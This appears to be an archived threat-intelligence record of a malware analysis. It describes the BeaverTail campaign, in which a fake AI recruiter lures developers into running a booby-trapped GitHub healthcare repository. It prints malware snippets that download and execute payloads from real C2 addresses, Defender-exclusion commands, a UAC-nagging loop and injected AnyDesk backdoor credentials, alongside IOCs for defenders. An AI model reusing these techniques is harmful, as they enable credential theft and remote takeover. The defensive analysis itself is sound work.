{
	"id": "df8fa633-cea8-4e89-8f01-99527e862bfd",
	"created_at": "2026-04-06T00:19:03.407088Z",
	"updated_at": "2026-04-10T13:12:58.779563Z",
	"deleted_at": null,
	"sha1_hash": "bb2fe7b3be077c56cf0d7b7df0b3583d5976734a",
	"title": "How a fake AI recruiter delivers five staged malware disguised as a dream job",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 13453564,
	"plain_text": "How a fake AI recruiter delivers five staged malware disguised as a\r\ndream job\r\nBy Shantanu\r\nPublished: 2025-10-20 · Archived: 2026-04-05 22:00:35 UTC\r\nOct 20, 2025\r\nOverview\r\nIt starts like every developer’s favourite notification:\r\n“You’ve been shortlisted for an AI engineering role.”\r\nThe company looks exciting - DLMind, an “AI-driven innovation lab.” The recruiter seems legit - Tim Morenc,\r\nCEDS, with a polished LinkedIn profile, professional tone, and a history of mutual connections.\r\nBut behind that friendly message lies BeaverTail - a malicious campaign engineered to hijack your curiosity, your\r\ncode, and your credentials.\r\nThe Hook\r\nDevelopers receive LinkedIn messages offering a lucrative remote position titled “Innovative AI Engineer.” The\r\nattacker, posing as Tim Morenc, invites them to collaborate on a private GitHub repository supposedly\r\ncontaining a coding assessment. The instructions are simple:\r\n“Clone the repo, review the code, run the setup, and share your feedback.”\r\nAnd that’s exactly what triggers the trap.\r\nThe Bite\r\nThe moment the provided script executes, it unfurls a five-staged payload - a meticulously crafted attack chain\r\ndesigned to blend into a developer’s workflow.\r\nThe malware silently:\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 1 of 23\n\nScans .env and configuration files for API keys, tokens, and wallet credentials\r\nSteals saved browser logins and cookies\r\nHijacks the clipboard\r\nCollects system fingerprints and local file inventories\r\nDeploys persistent backdoors using WebSocket beacons and AnyDesk for remote control\r\nBy the time the “assessment” finishes running, the attacker already owns the victim’s digital life.\r\nThe Setup\r\nFake Company: DLMind (dlmind-tech)\r\nAttacker Persona: Tim Morenc, CEDS - “AI Recruitment Lead”\r\n
Bait Role: Innovative AI Engineer\r\nGitHub Repo: github.com/dlmind-tech/AI-Healthcare\r\nObjective: Credential theft, crypto hijacking, and persistent access\r\nBeaverTail doesn’t just phish - it weaponises trust, blending social engineering with technical precision. In a\r\nworld where GitHub pull requests and LinkedIn job offers blur the line between opportunity and exploitation,\r\nBeaverTail reminds us that sometimes the most dangerous code review is the one you didn’t expect.\r\nInitial Access: The Technical Assessment\r\nTim Morenc CEDS contacts developers on LinkedIn about AI engineering positions at DLMind. Instead of a\r\ntypical coding interview, candidates receive a “technical assessment”:\r\n“Please review this codebase and share your technical thoughts. It’s one of our AI-powered healthcare products.”\r\nGitHub Repository: https://github.com/dlmind-tech/AI-Healthcare\r\nGitHub Org\r\n
Readme.md\r\nThe repository appears to be a Next.js application called “MEDIRA” — an AI-powered healthcare platform with\r\nthe following features:\r\nMongoDB Integration: Secure storage for medical data\r\nMedical Assistant: Get AI-powered medical assessments based on symptoms\r\nGoogle Gemini Integration: Advanced language model for accurate medical advice\r\nTo review the code and see it in action, the developer will naturally run:\r\ngit clone hxxps://github[.]com/dlmind-tech/AI-Healthcare.git\r\ncd AI-Healthcare\r\nnpm install\r\nnode run dev/build\r\nStage 0: The Backdoor\r\nWe have a large project with numerous directories and files, designed to be an AI-powered healthcare platform\r\nwith a wide range of features.\r\nCode Directory Structure\r\nWithin this project, there are two files that contain a backdoor mechanism. The backdoor is extremely well-hidden\r\nand is difficult to detect unless you are specifically searching for it.\r\nFile 1: auth/config/index.js (Line 98)\r\nEncoded C2 URL\r\nThis file contains the actual C2 URL where the 1st stage payload is present. It base64 decodes to\r\nloopsoft[.]tech:6168/defy/v8\r\nFile 2: auth/routes/cities.js (Lines 36–58)\r\n
Function to download and execute next payload\r\nThis is the function used for calling the payload from the C2 URL that it gets from the above base64, after\r\ndecoding it.\r\nHow It Works:\r\nThe backdoor executes automatically when node auth/server.js runs\r\nCalls loopsoft[.]tech:6168/defy/v8 on server startup\r\nThe C2 server deliberately returns an HTTP error 404 with the malicious JavaScript code embedded in the\r\ntoken field of the JSON response body.\r\nThe JavaScript payload in the error response gets executed with full Node.js privileges\r\nThis delivers the Stage 1 infostealer (4k+ lines of obfuscated JavaScript)\r\nC2 response with 404 status and malicious js in body\r\nStage 1: JavaScript InfoStealer\r\nThis is a nasty piece of heavily obfuscated malware that acts as an information stealer and also sets up persistent\r\nremote access. And not so surprisingly, it’s cross-platform. So it works well with Windows, Linux, and macOS.\r\nSerious efforts went into the development, with a lot of evasion techniques and comprehensive data theft\r\ncapabilities.\r\nHow it works\r\nThe raw JavaScript from the C2 server underwent multi-stage deobfuscation. The initial pass with a public\r\nJavaScript deobfuscator (https://deobfuscate.relative.im) successfully unpacked control flow obfuscation and\r\nrevealed the malware’s core components, including infostealer functions, file system operations, and network\r\nupload mechanisms. However, this addressed only the first layer; the remaining code used a custom Base91-based\r\nobfuscation scheme.\r\nPartially Deobfuscated JS\r\n
This obfuscation relied on a modified Base91 encoding with a twist: instead of a single decoding alphabet, the\r\nmalware used multiple unique character sets to encode different strings. This required identifying which alphabet\r\ncorresponded to each string, rather than using a single decoder. The key to decoding was recognising repeated\r\npatterns — such as alphabet strings followed by lookup functions (.indexOf(), .charAt(), or array access) — and\r\nspotting encoded string groups with similar lengths, distributions, and array storage patterns.\r\nFinal approach to decoding was:\r\nIdentify Targets: Manually define the exact start and end line numbers of code blocks known to contain\r\nencoded strings.\r\nExtract Decoding Keys: Scan the entire script using a specific pattern (‘…’.indexOf()) to find all possible\r\n91-character “alphabets” used for decoding.\r\nExtract Encoded Data: Isolate the code blocks defined in Step 1 and pull out all single-quoted strings,\r\nfiltering out the alphabet found in Step 2.\r\nDecode via Competition: For each piece of encoded data, attempt to decode it with every alphabet.\r\nScore the Results: Evaluate each decoded attempt using a heuristic scoring system. The system rewards\r\ncharacteristics of legitimate code (like keywords, URLs, and printable characters) and penalises gibberish.\r\nSelect the Winner: For each encoded string, the decoded version with the highest score is declared the\r\ncorrect one.\r\nGenerate a Report: Save all the successful encoded-to-decoded mappings into a structured JSON file for review\r\nand further use.\r\n
Decoded Strings\r\nThis worked nicely, and we were now able to piece together everything, which revealed more malware capabilities\r\nand an additional C2 infrastructure that was used for persistent access relying on WebSocket.\r\nC2 Infrastructure: The encoded data contained the complete WebSocket server configuration - address broken\r\ninto octets, port numbers, and unique identifiers. We could now see connections to 172[.]86[.]89[.]10:4382 that\r\nweren’t obvious in the partially-decoded code.\r\nBackdoor implementation: What looked like generic network code was actually a full Socket.IO backdoor with\r\nremote command execution, process disguising (“Node.js Javascript Runtime”), and PID locking to prevent\r\nmultiple instances.\r\nSurveillance capabilities: The decoded strings contained the clipboard monitoring implementation (polling every\r\n500ms with platform-specific commands), the keylogger setup with screenshot correlation, and the file scanner\r\nwith 35 search patterns targeting crypto-related files.\r\nVM detection: Complete evasion logic for Windows (wmic computersystem), macOS (system_profiler), and\r\nLinux (/proc/cpuinfo) to detect VMware, VirtualBox, QEMU, and other analysis environments.\r\nPython payload delivery chain: The decoded strings showed how it downloads an embedded Python runtime,\r\ninstalls it silently, and uses it to execute the next-stage downloader. Without breaking this encoding, we’d have\r\nseen a credential stealer targeting browsers and wallets. With the decoded strings, we discovered a multi-stage\r\nattack platform with real-time surveillance, remote access, anti-analysis features, and automated Python malware\r\ndeployment. The multi-alphabet obfuscation wasn’t just slowing analysis - it was hiding the malware’s true\r\nsophistication.\r\n
What It Does\r\n1. Data Theft:\r\n24 crypto wallets (MetaMask, Phantom, Coinbase, Binance Chain, TronLink, Keplr, Ronin, +17 more)\r\nacross Chrome, Brave, Edge, Opera, Firefox — up to 200 profiles per browser\r\nBrowser credentials - passwords, encryption keys, session tokens\r\nmacOS Keychain - complete credential database (~/Library/Keychains/login.keychain-db)\r\nSensitive files — 35 search patterns: *.env, *mnemonic*, *wallet*, *secret*, crypto configs, documents.\r\nWindows: scans ALL drives\r\n2. Surveillance:\r\nKeylogger (global capture)\r\nClipboard monitoring (500ms polling)\r\nScreenshots (every 3 seconds after keystrokes)\r\n3. System Profiling:\r\nReports to 172[.]86[.]89[.]10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e\r\nSends: OS type, platform, hostname, user info, VM detection status\r\n4. Remote Access:\r\nWebSocket persistent backdoor (172[.]86[.]89[.]10:4382) with Socket.IO\r\nProcess disguised as “Node.js JavaScript Runtime”\r\n5. Data Exfiltration:\r\nStolen credentials/wallets → 88[.]218[.]0[.]78:1224/uploads (POST, multipart/form-data)\r\nFile scanner results → 172[.]86[.]89[.]10:4382/upload (screenshots, keylog data, scanned files)\r\nClipboard data → 172[.]86[.]89[.]10:4382/api/service/makelog (every 500ms)\r\nPython Payload Deployment\r\nAfter stealing data, the malware automatically deploys the next stage - a Python-based downloader that brings in\r\nadditional malware components.\r\nfetch('http://88[.]218[.]0[.]78:1224/pdown')\r\n.then(response =\u003e response.arrayBuffer())\r\n.then(data =\u003e {\r\nfs.writeFileSync(tmpDir + '\\\\p.zi', data)\r\nfs.renameSync(tmpDir + '\\\\p.zi', tmpDir + '\\\\p5.zip')\r\nexec('tar -xf \"' + tmpDir + '\\\\p5.zip' + '\" -C \"' + homeDir + '\"')\r\n})\r\nThe config API (api[.]npoint[.]io/96979650f5739bcbaebb) returns {\"name\": \"winrar\"}, which tells the malware to\r\nextract Python to C:\\Users\\{user}\\winrar\\python.exe.\r\nDownloads Stage 2 Python Script\r\n// Download heavily obfuscated Python downloader\r\nrequest.get('http://88[.]218[.]0[.]78:1224/client/3/603', (err, res, body) =\u003e {\r\nfs.writeFileSync(homeDir + '/.nlq', body)\r\nexec('\"' + homeDir + '\\\\winrar\\\\python.exe\" \"' + homeDir + '/.nlq\"')\r\nexec('python3 \"' + homeDir + '/.nlq\"')\r\n})\r\nExecution flow: Stage 1 JS → downloads Python runtime → downloads .nlq → executes .nlq\r\nStage 2: Python Downloader\r\nFile: ~/.nlq\r\nThis .nlq is an obfuscated Python file wrapped in 64 layers of reverse→base64→zlib encoding. After decoding it,\r\nwe get the following piece of code:\r\n
Python code of .nlq\r\nThe script first ensures it has the necessary dependencies - if the `requests` library isn’t available, it auto-installs it\r\nusing pip. Then it reaches out to the same C2 server (`88[.]218[.]0[.]78:1224`) that delivered the JavaScript\r\npayload, but this time hitting different endpoints to fetch Python-based malware.\r\nWhat It Does\r\nMake sure the requests library is installed\r\nDownloads the code and saves it to a hidden directory and executes it\r\nhxxp://88[.]218[.]0[.]78:1224/payload/3/603 → ~/.n2/way\r\nhxxp://88[.]218[.]0[.]78:1224/brow/3/603 → ~/.n2/pow\r\nPlatform Behaviour:\r\nWindows/Linux: Executes both payloads\r\nmacOS: Exits after first payload (if ot==\"Darwin\": sys.exit(-1))\r\nStage 3A: Python RAT (64 Layers)\r\nFile: ~/.n2/way\r\nC2 Socket: 88[.]218[.]0[.]78:2243\r\nThe ~/.n2/way file is a Python Remote Access Trojan wrapped in 64 layers of the same reverse→base64→zlib\r\nobfuscation. Once decoded and executed, it provides the attacker with an 8-command toolkit for complete system\r\ncontrol, data exfiltration, and deployment of additional malware stages.\r\nHow it works\r\nAfter decoding, the RAT first profiles the victim system — gathering hostname, IP address, geolocation data (via\r\nip-api[.]com), and a unique identifier derived from the MAC address and username. This registration data is sent\r\nto 88[.]218[.]0[.]78:1224/keys, allowing the attacker to track and organise victims. The RAT then establishes a\r\npersistent TCP socket connection to 88[.]218[.]0[.]78:2243 and waits for commands.\r\nOn Windows systems, the RAT also includes a keylogger component using pyWinhook, pyperclip, and pythoncom\r\nlibraries. It captures all keystrokes with window context, mouse clicks, clipboard activity (with Ctrl+C/V\r\nmarkers), and active window information (process name, PID, timestamp). This data accumulates in a global\r\nbuffer until the attacker requests export via Command 3.\r\n
What It Does\r\nThe RAT provides 8 sophisticated commands for the following actions:\r\nCommand || Function || Description\r\n1 || ssh_obj || Remote shell + directory navigation\r\n2 || ssh_cmd || Kill all Python processes (self-destruct)\r\n3 || ssh_clip || Export keylogger buffer (Windows only)\r\n4 || ssh_run || Download/execute /brow/3/603 -\u003e ~/.n2/bow\r\n5 || ssh_upload || Upload files/directories/patterns\r\n6 || ssh_kill || Terminate Chrome \u0026 Brave browsers\r\n7 || ssh_any || Download AnyDesk hijacker -\u003e ~/.n2/adc\r\n8 || ssh_env || Scan C: through G: drives for .env files\r\nSystem Registration with C2:\r\n# Sent to hxxp:\r\n{\r\n 'uuid': sha256(MAC_ADDRESS + USERNAME),\r\n 'hostname': '603_' + os.hostname(),\r\n 'internalIp': LOCAL_IP,\r\n 'query': EXTERNAL_IP, # via ip-api.com\r\n 'country': COUNTRY, # via ip-api.com\r\n 'city': CITY, # via ip-api.com\r\n 'lat': LATITUDE, 'lon': LONGITUDE\r\n}\r\nKey Capabilities:\r\nRemote shell access — Full command execution with output\r\nKeylogger export — Windows-specific keystroke capture with window context\r\nTargeted file theft — Hunts for .env files across all Windows drives (C: through G:)\r\nBrowser disruption — Kills Chrome/Brave to clear memory artefacts\r\nStage 4 deployment — Downloads AnyDesk hijacker via Command 7\r\nC2 Communication:\r\nRegistration: 88[.]218[.]0[.]78:1224/keys (HTTP POST)\r\nCommand channel: 88[.]218[.]0[.]78:2243 (TCP socket)\r\n
Stage 3B: Tsunami Persistence\r\nThe ~/.n2/pow file is the persistence framework, wrapped in 128 layers of reverse→base64→zlib obfuscation —\r\ntwice the depth of the RAT. This runs only on Windows and Linux (exits immediately on macOS). Its sole\r\npurpose: ensure the malware survives reboots, security scans, and user cleanup attempts.\r\nHow it works\r\nThe persistence mechanism is multi-layered and aggressive. First, it checks if Python is installed, and if not,\r\ndownloads Python 3.11.0 from either the official Python [.]org site or one of 100+ encrypted fallback mirror URLs\r\n(encoded with Hex→XOR→Base64→Reverse using key !!!HappyPenguin1950!!!). It then installs the\r\ncryptography library and writes a startup injector to the Windows Startup folder.\r\nOn next boot, the injector checks if a scheduled task already exists. If not, it extracts and executes the main\r\npayload, which creates a scheduled task named “Runtime Broker” (mimicking a legitimate Windows process),\r\nadds Windows Defender exclusions, and starts an infinite UAC bypass loop that shows privilege escalation\r\nprompts every 10–20 minutes until the user accepts.\r\nWhat It Does\r\nTriple Persistence:\r\n1. Startup Folder — %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Windows Update\r\nScript.pyw\r\nWindowless Python script (.pyw extension = no console window)\r\n50-layer obfuscated\r\nRuns automatically at user logon\r\n2. Scheduled Task — “Runtime Broker” (mimics legitimate Windows process)\r\nExecutes: %APPDATA%\\Microsoft\\Windows\\Applications\\Runtime Broker.exe\r\nTrigger: At logon\r\nPrivileges: Highest\r\n3. Hidden Executable — Runtime Broker.exe with a hidden file attribute\r\nWindows Defender Bypass:\r\nAdd-MpPreference -ExclusionPath '%APPDATA%\\...\\Runtime Broker.exe'\r\nAdd-MpPreference -ExclusionPath '%LOCALAPPDATA%\\...\\msedge.exe' # XMRig miner\r\nUAC Bypass (Infinite Retry):\r\nwhile True:\r\n time.sleep(random.uniform(600, 1200))\r\n if execute_payload_with_uac():\r\n break\r\nThe UAC prompt appears every 10–20 minutes until the victim clicks “Yes,” giving the malware administrative\r\nprivileges. Most users eventually accept the prompt simply to make the pop-ups stop.\r\nPython Auto-Installation:\r\nPrimary source: python[.]org/ftp/python/3.11.0/python-3.11.0-amd64.exe\r\nFallback: 100+ encrypted mirror URLs\r\nSilent install: /quiet InstallAllUsers=1 PrependPath=1\r\nThis ensures the malware can run even on systems without Python, making it completely self-sufficient.\r\n
Stage 4: AnyDesk Hijacker\r\nThe final stage is a Python script (~/.n2/adc) deployed via RAT Command 7. Unlike the earlier stages, this one has\r\nno obfuscation. By Stage 4, they’ve already harvested credentials, established remote access, and secured\r\npersistence. Now they’re adding a GUI remote desktop backdoor using legitimate software.\r\nAnyDesk Hijacker Code\r\nHow it works\r\nThe script first checks if AnyDesk is installed. If not, it downloads the official installer from a dedicated\r\noperational server (95[.]164[.]17[.]24:1224/any). It then locates the AnyDesk configuration file (service.conf in\r\n%APPDATA%\\anydesk\\ on Windows or ~/.anydesk/ on Linux) and injects hardcoded backdoor credentials: a\r\npassword hash, password salt, and token salt.\r\nAfter injecting the credentials, the script uploads the modified config to 95[.]164[.]17[.]24:1224/keys for the\r\nattacker’s records, kills the AnyDesk process, restarts it (which loads the backdoored config), and then deletes\r\nitself. The result is a persistent GUI remote access channel that looks completely legitimate to security software\r\nand users.\r\nWhat It Does\r\nAnyDesk Hijacking Process:\r\n1. Installation check — Downloads AnyDesk from 95[.]164[.]17[.]24:1224/any if missing\r\n2. Config injection — Modifies service.conf with backdoor credentials\r\n3. Config exfiltration — Uploads modified config to 95[.]164[.]17[.]24:1224/keys\r\n4. Service restart — Kills and restarts AnyDesk to load backdoored config\r\n5. Self-deletion — Removes the hijacker script (no artefacts)\r\nInjected Credentials:\r\nad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d\r\nad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345\r\nad.anynet.token_salt=e43673a2a77ed68fa6e8074167350f8f\r\nConfig File Locations:\r\nWindows: %APPDATA%\\anydesk\\service.conf\r\nLinux: ~/.anydesk/service.conf\r\nThe beauty of this approach from an attacker’s perspective is that AnyDesk is legitimate remote desktop software\r\nused by millions of IT professionals. Security tools won’t flag it, and even if a user notices AnyDesk running, they\r\nmight assume it’s legitimate IT support software. The attacker now has full GUI access — they can see the screen,\r\nmove the mouse, and interact with the system as if they were sitting at the keyboard.\r\nC2 Server: 95[.]164[.]17[.]24:1224 (dedicated AnyDesk operations server, separate from the other C2s)\r\nAttack Chain Overview\r\n
Malware Execution Flow\r\nIndicators of Compromise (IOCs)\r\nC2 URLs and File Drops\r\nComplete URL || Purpose\r\nhxxp://loopsoft[.]tech:6168/defy/v8 || Stage 0: Delivers Stage\r\nhxxp://88[.]218[.]0[.]78:1224/uploads || Stage 1: Exfiltrates st\r\nhxxp://88[.]218[.]0[.]78:1224/pdown || Stage 1: Downloads Pyth\r\nhxxp://88[.]218[.]0[.]78:1224/client/3/603 || Stage 1: Downloads Stag\r\nhxxp://172[.]86[.]89[.]10:4382/ || Stage 1: WebSocket back\r\nhxxp://172[.]86[.]89[.]10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e || Stage 1: Proce\r\nhxxp://172[.]86[.]89[.]10:4382/api/service/makelog || Stage 1: Keylogger data\r\nhxxp://172[.]86[.]89[.]10:4382/upload || Stage 1: Screenshot/fil\r\nhxxp://88[.]218[.]0[.]78:1224/payload/3/603 || Stage 2: Downloads Pyth\r\nhxxp://88[.]218[.]0[.]78:1224/brow/3/603 || Stage 2: Downloads pers\r\nhxxp://88[.]218[.]0[.]78:1224/keys || Stage 3: RAT registrati\r\nhxxp://88[.]218[.]0[.]78:2243/ || Stage 3: Socket.IO RAT\r\nhxxp://88[.]218[.]0[.]78:1224/adc/3 || Stage 3: Downloads AnyD\r\nhxxp://95[.]164[.]17[.]24:1224/any || Stage 4: Downloads AnyD\r\nhxxp://95[.]164[.]17[.]24:1224/keys || Stage 4: Uploads hijack\r\nUnique Domains\r\nloopsoft[.]tech\r\napi[.]npoint[.]io\r\nip-api[.]com\r\nUnique IP Addresses\r\n88[.]218[.]0[.]78 # Primary C2 (ports 1224, 2243)\r\n172[.]86[.]89[.]10 # WebSocket C2 (port 4382)\r\n95[.]164[.]17[.]24 # AnyDesk operations (port 1224)\r\n
Critical File Paths\r\nPath || Purpose\r\n~/.nlq || Stage 2 downloader (64 layers\r\n~/.n2/way || Stage 3A RAT (64 layers)\r\n~/.n2/pow || Stage 3B persistence (128 laye\r\n~/.n2/adc || Stage 4 AnyDesk hijacker\r\n~/.n3/ || File scanner staging\r\n%TEMP%\\cc.pid || WebSocket backdoor PID lock (W\r\n/tmp/cc.pid || WebSocket backdoor PID lock (L\r\n$TMPDIR/cc.pid || WebSocket backdoor PID lock (m\r\n%TEMP%\\up.pid || File scanner PID lock (Windows\r\n/tmp/up.pid || File scanner PID lock (Linux/m\r\n%TEMP%\\windows cache\\ || Keylogger cache directory (Win\r\n/tmp/windows cache/ || Keylogger cache (Linux/macOS,\r\n%TEMP%\\windows cache\\1.tmp || Keylog fallback storage\r\n%TEMP%\\windows cache\\2.jpeg || Screenshot temporary storage\r\n%TEMP%\\p.zi || Python runtime download temp f\r\n%TEMP%\\p5.zip || Python runtime ZIP before ext\r\n%APPDATA%\\...\\Startup\\Windows Update Script.pyw || Persistence\r\nFile Hashes (SHA-256)\r\nNote: Hashes represent the obfuscated payloads as delivered by C2 servers and written to disk.\r\nOn-Disk Path | SHA-256\r\n--------------------|-----------------------------------------------------------------\r\n~/.nlq | b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58\r\n~/.n2/way | 9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160\r\n~/.n2/pow | 006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f\r\n~/.n2/adc | ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e\r\n%TEMP%\\p5.zip | 99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342\r\nDetection Signatures\r\nAnyDesk Backdoor Credentials:\r\nad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d\r\nad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345\r\nad.anynet.token_salt=e43673a2a77ed68fa6e8074167350f8f\r\nProcess Indicators:\r\nProcess title: “Node.js JavaScript Runtime”\r\nPython from hidden dirs: python ~/.n2/way, pythonw.exe “%APPDATA%\\…\\Runtime Broker.exe”\r\nScheduled task: “Runtime Broker”\r\n
Conclusion\r\nBeaverTail demonstrates how sophisticated malware campaigns exploit trust in professional platforms and\r\nstandard development workflows. A simple “review this code” request from what appears to be a legitimate\r\nrecruiter leads to complete system compromise in under 15 seconds. The extraction of such secrets means that one\r\ncompromised computer can lead to many more breaches, depending on what access the victim has, and can\r\nultimately threaten the company’s security.\r\nIf you received a message from “Tim Morenc CEDS” or were asked to review code from dlmind-tech, your system\r\nmay be compromised.\r\nSource: https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263"
	],
	"report_names": [
		"how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434743,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.pdf",
		"text": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.txt",
		"img": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.jpg"
	}
}